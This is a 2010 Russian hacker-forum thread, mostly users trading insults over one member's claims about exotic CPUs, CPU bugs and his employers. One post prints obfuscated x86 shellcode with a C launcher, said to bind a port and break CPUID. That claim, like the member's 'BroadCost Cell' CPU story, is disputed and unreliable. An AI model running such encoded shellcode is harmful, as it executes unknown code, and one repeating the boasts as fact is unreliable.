# демонстрация ЦП багов вживую

Тема в разделе "WASM.HEAP", создана пользователем kaspersky, 31 авг 2010.

  1. chop

    chop New Member

    Публикаций:
    0
    Регистрация:
    6 сен 2010
    Сообщения:
    2
    Satsura,
    Вы тут писали, что работаете в MacAfee:
    http://www.linux.uz/forum/index.php/topic,2049.msg27196.html#msg27196

    Это правда? Может оба в Казахстан приедете? Один спец(Касперский) хорошо, а два еще лучше.
     
  2. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    >>Всё это круто. Но почему у вас мыло на ксакепе ?
    - Ну это одна из почт;) В основном ей пользуюсь, т.к она на удобном двиге GMAIL работает. А так их много вообщет. Есче вот этим чаще всего пользуюсь последнее время:
    administration@inbox.uz, satsura@inj3ct0r.com[работает крайне не стабильно из-за ДДОС'а со стороны спецслужб, но тоже очень очень классная панель управления там] sanjar@buxoro.uz, d34dm4st3rs@yandex.ru, etc%)

    >>Вы тут писали, что работаете в MacAfee:
    http://www.linux.uz/forum/index.php/topic,2049.msg27196.html#msg27196
    >>Это правда? Может оба в Казахстан приедете? Один спец(Касперский) хорошо, а два еще лучше.
    - Вообщет пишется McAfee. Да работаю. Удаленка. Работаю чисто из за спортивного интереса. Тут с тоже Адоб второй раз предложили работу (На этот раз менеджер их официально вышел с предложением.)... Вот... так... думаю... Может свалить.... Хотя таких ребят как я компании[корпорации] типа Adobe , Microsoft, IBM[etc] проводят через соковыжималку[выжимают сок идей и возможностей] а потом выкидывают как ненужный жмыхъъъ((( Вот так вот ребята...
    А Узб. у нас пока есче дикий. необъезжанный рынок. основная масса софта (98%) - нелегальная, прокрэченная.Если есть мозги даже здесь есть возможность нормально развернуться;)
    --------
    Насчет поездки ничего не могу сказать. Времени чисто не хватает даже чтобы нормально поесть. Обед, Ужин - возле компа и проходит... Последнее время работаю в режиме глубокого хачанья (18-20ч/24ч). Так что без обид.
     
  3. fsd

    fsd New Member

    Публикаций:
    0
    Регистрация:
    4 июл 2010
    Сообщения:
    353
    the true story?
    [​IMG]
     
  4. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    >> Один спец(Касперский) хорошо, а два еще лучше.
    - А да есче chop, Крис не любит когда путают его псевдоним с Дядей Женей.
    Он Крис Касперски, а не Касперский.

    >>the true story?
    - типо троль?...
     
  5. dfrsa

    dfrsa New Member

    Публикаций:
    0
    Регистрация:
    5 янв 2010
    Сообщения:
    88
    На песикиежь похоже. Кортинка к месту.
     
  6. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    dfrsa. Так ли это ?))
    Почта работает. Просто бывают сбои. Раньше такая проблема и на Xakep.RU отмечалась;)
    Я просто сказал то что есть. Частенько с 21:00 до 4:00 (а то и больше SMTP сервер этого ресурса отказывается работать). Об этом можно спросить украинского паренька, (a.k.a inj3ct0r) админа ресурса(где хостится сайты inj3ct0r.com, 0xr00t.com)
    Зы.:Могу отправить без проблем с него тестовое письмо или показать фэйс ясчика;)

    Зы.ЗЫ.: Я вот что заметил, на этом форуме когда ты начинаешь рассказывать подробно о своих делах и жизни как таковой, тебя начинают тролить, причем по любому поводу.
    Хотя мне не обидно. Я понимаю что так должно быть. Криса ведь тоже тролят, да и Clerk'a...
    Так вот уважаемые товарисчи, пишите все что хотите, ибо человеку вставший на путь Дзена мне узже нет до этого никакого дела... На сих Satsura заворачивается и больше никогда не посмеет потревожить ваш взор своими тупыми рассказами.

    -----------
    S4(uR4 нарываясь на красноглазие почти дохачил Darwin'a под Sparc чтобы предствить его миру.... И тут его сбили с мысли...
    И на последок самая мощная фраза из 101 Дзенской истории : Так ли это господа?
     
  7. dfrsa

    dfrsa New Member

    Публикаций:
    0
    Регистрация:
    5 янв 2010
    Сообщения:
    88
    Бред. И как эти левые домыслы связаны с:
    Вы переврали самого себя ;)
     
  8. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    dfrsa, зачем далеко ходить ?)) достаточно спросить у админа этого ресурса почему до него невсегда доходят письма и услышите мой ответ.

    >>Вы переврали самого себя ;)
    - Ну ну. Вам виднее.
     
  9. Medstrax

    Medstrax Забанен

    Публикаций:
    0
    Регистрация:
    18 июл 2006
    Сообщения:
    673
    А куда делись еще 52 "BroadCost Cell" CPU? Тут http://wasm.ru/forum/viewtopic.php?pid=389323#p389323 ты чесал про 112 процов. Кстати, просвети, а что за "Broadcost Cell" CPU? Тупой гугль о таком CPU не знает. Бред малолетнего дрочера? Тьфу, я имел в виду - Секретная Разработка Служб Безопасности?
     
  10. Clerk

    Clerk Забанен

    Публикаций:
    0
    Регистрация:
    4 янв 2008
    Сообщения:
    6.689
    Адрес:
    РБ, Могилёв
    Satsura
    Дзена у аверов нет.
     
  11. kaspersky

    kaspersky New Member

    Публикаций:
    0
    Регистрация:
    18 май 2004
    Сообщения:
    3.006
    Clerk
    > Дзена у аверов нет.
    я уважаю вашу точку зрения. у вас есть вера. не у всех она есть. вот у меня ее нет и мне все равно под каким флагом махать мечом и что на этом флаге написано. я просто точу ништяки, ковыряюсь в коде, общаюсь с пиплами, что в теме и получаю от этого удовольствие. у меня нет ни белой и темной стороны, потому что в мире вообще нет ни добра, ни зла, а есть только разные религии и после того как я узнал, что по понятиям дзена буддисту нельзя есть мсяо, я понял, что я ни хвоста не буддист, хотя с буддистами общаюсь регулярно. как по мылу, так и в живую. и чем больше я с ними общаюсь, тем меньше тянет на дзен.
     
  12. Guru_of_Zen

    Guru_of_Zen Member

    Публикаций:
    0
    Регистрация:
    21 янв 2010
    Сообщения:
    288
    зачетная.
    на фоне надо еще БредКост СРУ нарисовать.

    PS Satsura, если вы такой специалист некислый, хачающий глубокие режимы по 20 часов в сутке, да еще и дзен-буддист, откуда у вас время на саморекламу в у*бищных соц. сетях и на форумы (дело ведь далеко не только пространными постами на васм.ру ограничивается) ?

    и даже тут дело не тока во времени, а в простейшей логике ?

    зачем устоявшемуся и проявившему себя специалисту (макаффи, службы безопасносте, вон даже манагеры с адоба лично приглашают -- стало быть, цель достигнуто ?) -- рекламировать себя на соц. сетях ? (вы даже как-то надысть всем советовали, мол пиар и тока пиар, особенно на линкедИн.)

    вопщем где логика, где смысл (анекдот про вовочку думаю знаете ? ) ?
     
  13. kaspersky

    kaspersky New Member

    Публикаций:
    0
    Регистрация:
    18 май 2004
    Сообщения:
    3.006
    Guru_of_Zen
    > PS Satsura, если вы такой специалист некислый, хачающий
    > глубокие режимы по 20 часов в сутке, да еще и дзен-буддист,
    > откуда у вас время на саморекламу в у*бищных соц. сетях
    хоть вопрос и не ко мне, но я все-таки отвечу. точнее спрошу. а откуда у _вас_ время на такое кол-во вопросов не по существу? давно бы уже достали и померялись...

    > и даже тут дело не тока во времени, а в простейшей логике ?
    не ищите везде логики, а то ведь можете и до суицида дойти, поняв, что логики нет. кстати, я вот только вчера суицидом занимался. было интересно -- а что же буде _там_ ?! а там в общем-то ничего интересного нет... просто мыщъх проснулся. но я хронически путаю сон с явью, а во сне суицид совешал уже неоднократно, когда был совершенно уверен, что это ни разу не сон.

    > зачем устоявшемуся и проявившему себя специалисту (макаффи,
    работа на макаффи ни о чем не говорит. как и работа на гугла или ms. ну то есть говорит конечно, что кого-то взяли, а кого-то нет, но это в общем-то дело случая. я вот в mcafee попал совершенно случайно.

    > службы безопасносте, вон даже манагеры с адоба лично приглашают
    вы просто не в курсе в чем обязаннось манагеров. она как раз в этом и состоит. чем им еще заниматься?! я вот тоже с CTO/SVP свободно общаюсь, а мой VP мой лучший друг. ну и что?

    > стало быть, цель достигнуто ?) -- рекламировать себя на соц. сетях ?
    > (вы даже как-то надысть всем советовали, мол пиар и тока пиар, особенно на линкедИн.)
    как-то вы нервно на пиар реагируете. расслабтесь.

    > вопщем где логика, где смысл (анекдот про вовочку думаю знаете ? ) ?
    я вот, кстати, не в курсе кто пиарит себя. а вы в курсе :derisive: мне оно фиолетово. а вам нет :derisive:
     
  14. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
  15. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    >>А куда делись еще 52 "BroadCost Cell" CPU? Тут http://wasm.ru/forum/viewtopic.php?pid=389323#p389323 ты чесал про 112 процов. Кстати, просвети, а что за "Broadcost Cell" CPU? Тупой гугль о таком CPU не знает. Бред малолетнего дрочера? Тьфу, я имел в виду - Секретная Разработка Служб Безопасности?

    - medstrax1, вот держите : http://www.google.co.uz/search?hl=r...A&ved=0CBEQvgUoAA&q=BroadCost+Cell+CPU&nfpr=1
    А насчет куда делись есче 52 CPU могу ответь скромно : У мну в Бухаре стоит средняя реализация этого майнфрейма.[Без Parallels GPU, CrossFade синхронизаторов, и т.д. Но зато RAID-5 :p]. Самый мощный стоит в Центре научных и исследовательских разработок (НИИРУз). на нем как раз и стоит полный боекомплект.

    >>Дзена у аверов нет.

    - Clerk, я уже не впервый раз говорю что я не авер. Я и не вексер. Моя есть - реверс инженер.[в простонародье кодокопатель,хакер]. Дзен понятие относительное. Согласитесь назвать Дзен религией или верой это как то не правильно. Тем более для нас , людей постсоветского пространства. Для меня понятие Дзен - Свобода мысли. Свовода информации. Свобода слова. [Be Cool! Be Free!] Все что вам и нам так не хватает(я неговорю уже о том что наши государства неуклонно повторяют о том что у нас с вами демократическое государство. Хотя на практике оказывается наоборот) из-за комплексов или угроз со стороны общества. Боязнь проявить себя , извените меня это никакой ни Дзен. Вот и здесь меня стараются тролить по любому поводу, думая что могут задеть мои чувства. Посмею их разочаровать, т.к я уже на троллинг никак неведусь. ;p



    >>скорее всего "BroadCast Cell" имелось ввиду,
    IBM разработки на PowerPC
    что то типа этого http://en.wikipedia.org/wiki/Cell_(microprocessor)

    - Да. спасибо за разъяснение. Я это и имел ввиду. Скажу больше архитектура CPU которая используется в наших майнфреймах -это ничто иное как выдернутые CPU из PS3[Play Station3].
    Предугадаю вопрос большинства: почему же все таки Cell ? а не Itanium, Sparc, или i7 ?
    Ответ прост. Хотя и компания Intel так мощно разрекламировалa свой процессор Intel i7(сказали что это самый мощный процессор в мире!), на самом деле оно таковым не является. Самый мощный и стабильный процессор в мире это BroadCost Cell. Архитектура Cell позволяет расширять возможности процессора не только на физическом , но и на программном уровне;) Тем более новый компилятор CellGCC позволяет максимизировать эффективность написаного софта, а собранные библиотеки Glibc, CellSTI, etc... позволяют на лету (прозрачным JIT) обрабатывать многомиллионные запросы в сотнях, тысячах потоках, да же без средств GPU;)

    >>да.. сатсура тот еще крис в профеле
    - Спасибо за комплемент.

    >>PS Satsura, если вы такой специалист некислый, хачающий глубокие режимы по 20 часов в сутке, да еще и дзен-буддист, откуда у вас время на саморекламу в у*бищных соц. сетях и на форумы (дело ведь далеко не только пространными постами на васм.ру ограничивается) ?

    и даже тут дело не тока во времени, а в простейшей логике ?

    зачем устоявшемуся и проявившему себя специалисту (макаффи, службы безопасносте, вон даже манагеры с адоба лично приглашают -- стало быть, цель достигнуто ?) -- рекламировать себя на соц. сетях ? (вы даже как-то надысть всем советовали, мол пиар и тока пиар, особенно на линкедИн.)

    вопщем где логика, где смысл (анекдот про вовочку думаю знаете ? ) ?

    - Во первых когда я сказал что хачу по 20 ч в сутки я иммел виду полезное просиживание за компом 18-20 ч. (иногда бывает конечно меньше по 14-16 ч, но это так проблема из за так называемых передвижений в простанстве (в 4-D режиме))
    Во вторых LinkedIn не "у*бищная " соц. сеть. В ней куча профессионалов, с которыми есть о чем поговорить, подделиться с мыслями, научиться уму-разуму (чего и вам советую кстати). Есть также группы в которые по желанию можно вступить , впоследствии можно также задавать вопросы на большую часть из которых вы можете получить разнообразные ответы(часть которых вам поможет в разрешении той или иной проблемы).
    LinkedIn дает большие возможности, начиная с карьерного роста(пиара, и т.д и т.п) и заканчивая большим разворотом в крупных компаниях, которые с удовольствием могут вам предоставить оборудование, и т.д и т.п для различных исследований, разработок... Если вы действительно умный и вы не боитесь поделить мыслями с миром, если вам быстро надо найти союзников и мощных Если вы действительно умный и вы не боитесь поделить мыслями с миром то добро пожаловать на LinkedIN.
    Зы.: Цели и желания человека безграничны. Главное в этой жизни иметь возможность и небояться их релизовать.
    2 ALL : Be Cool! Be Free!

    У мну все. Всем удачи.

    --------------------

    Крис, как продвижения идут ? Вы обесчали но так и не ответили на то письмо)
     
  16. kaspersky

    kaspersky New Member

    Публикаций:
    0
    Регистрация:
    18 май 2004
    Сообщения:
    3.006
    Satsura
    > Крис, как продвижения идут ? Вы обесчали но так и не ответили на то письмо)
    два zero-days подряд. три бессонные ночи... отвечу сегодня как проснусь. а щас мыщъх спать...
     
  17. Medstrax

    Medstrax Забанен

    Публикаций:
    0
    Регистрация:
    18 июл 2006
    Сообщения:
    673
    А какой смысл меряться органами с пиз...болом? Я понимаю, имеет смысл меряться с клерком, но с этим чудом... Все, что он пишет на поверку оказывается полной ахинеей. Вот неплохой экземплярчик http://forum.reverse4you.org/showthread.php?t=529.
    Позволю себе цитату
    Может товарищ сацура просветит своих недалеких оппонентов, что же есть в его понимании "CPUID регистр". А что такое "супернеуязвимые суперрегистры"? Не стесняйся, повесели нас.
     
  18. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    >>А какой смысл меряться органами с пиз...болом? Я понимаю, имеет смысл меряться с клерком, но с этим чудом... Все, что он пишет на поверку оказывается полной ахинеей. Вот неплохой экземплярчик http://forum.reverse4you.org/showthread.php?t=529.

    medstrax1, а ты этот сплойт пробовал на вкус ?

    Код (Text):
    1. char shellcode[] =
    2.  
    3.     "\x31\xc0"              // xor %eax,%eax
    4.     "\x0f\xa2"              // cpuid
    5.     "\x51"                  // push %ecx
    6.     "\x68\xe7\x95\xa8\xec"  // push $0xeca895e7
    7.     "\x68\xde\x7f\x37\x3f"  // push $0x3f377fde
    8.     "\x68\x07\x1a\xec\x8f"  // push $0x8fec1a07
    9.     "\x68\x6e\x1c\x4a\x0e"  // push $0x0e4a1c6e
    10.     "\x68\x06\x5b\x16\x04"  // push $0x04165b06
    11.  
    12.     //
    13.     // <_unpack_loop>:
    14.     //
    15.  
    16.     "\x31\x0c\x24"          // xor %ecx,(%esp)
    17.     "\x5a"                  // pop %edx
    18.     "\x75\xfa"              // jne <_unpack_loop>
    19.     "\x83\xec\x18"          // sub $0x18,%esp
    20.     "\x54"                  // push %esp
    21.     "\xc3";                 // ret
    22.  
    23. int main(int argc, char **argv) {
    24.     int *ret;
    25.     ret = (int *)&ret + 2;
    26.     (*ret) = (int) shellcode;
    27. }
    Я вот попробовал (тестил: Gentoo, Slackware 12.0, BackTrack2.0), так вот процессору сносит башню причем прилично. Лично на моем стареньком Intel Extreme(3,00) кроме бинда порта происходили непонятные , но весьма заманчивые действия с регистром CPUID, вместо получения информации о CPU , я получил в исполнениемые данные находящихся за пределами стека;) Пример продемонстрирован и опробован ребятами того форума который вы привели нам.

    А вам слабо хотя бы такой ресерч произвести ?)

    >>пиз...болом
    - В следуюсчий раз получишь набор ножей абсолютно бесплатно;)

    >>Может товарищ сацура просветит своих недалеких оппонентов, что же есть в его понимании "CPUID регистр". А что такое "супернеуязвимые суперрегистры"? Не стесняйся, повесели нас.
    - Обкуритесь, повода для веселья будет больше;)

    Зы.: Честно сказать , я не люблю оглядываться назад. Все что когдато было, все что я когда писал приносило удовольствие не только мне , но и другим (посмотрите сколько я выложил постов на их форуме, и сколько раз и кто меня поблагодарил;)).
    Недавно низкоуровнево форматнул винт со своими старыми сорсами и статьями. Они меня уже больше не интересуют. Ибо сейчас я живу в совершенно в другом мире , да и окружение у меня заметно изменилось.
    2ALL : Пишите по существу, а именно по теме. Тошно уже вам на ваши оутпостные коменты отвечать. Крис приедет в Узб. У нас как раз будет возможность с ним поговорить, заснимем все это дело на камеру, да и разместим все эти дела для общества форума WASM. Потом вот и поговорим кто гонит, что гонит, когда гонит и как гонит;)
    Зы.: Если вам не дала жена, у вас проблемы в университете, вам мало платят или вас не берут на работу, может проблема вас , а не в окружающих?) Хватит писать garbage. И да если хотите померяться, укажу правильный вам путь - форум.античат.ру ;)

    Зы.:Если хотите поговорить или возникли вопросы пишите в личку. Я лично могу разъяснить, показать все что я вам говорил, демонстрировал;)
     
  19. TermoSINteZ

    TermoSINteZ Синоби даоса Команда форума

    Публикаций:
    2
    Регистрация:
    11 июн 2004
    Сообщения:
    3.549
    Адрес:
    Russia
    Satsura
    Собственно, medstrax1а уже несколько раз банили :) Так что вы поменьше так реагируйте. Из серии - не кормите...
     
  20. Satsura

    Satsura S4(uR4 __r00tw0rm__

    Публикаций:
    0
    Регистрация:
    22 апр 2010
    Сообщения:
    374
    Адрес:
    Узбекистон, бляать!!11 :D
    TermoSINteZ, спасибо большое. учту на будующее.
    TermoSINteZ, McAfee с Intel вроде какую то тусовку намечает на март 2011 вы не в курсе?) Вас случаем не приглашали никуда?)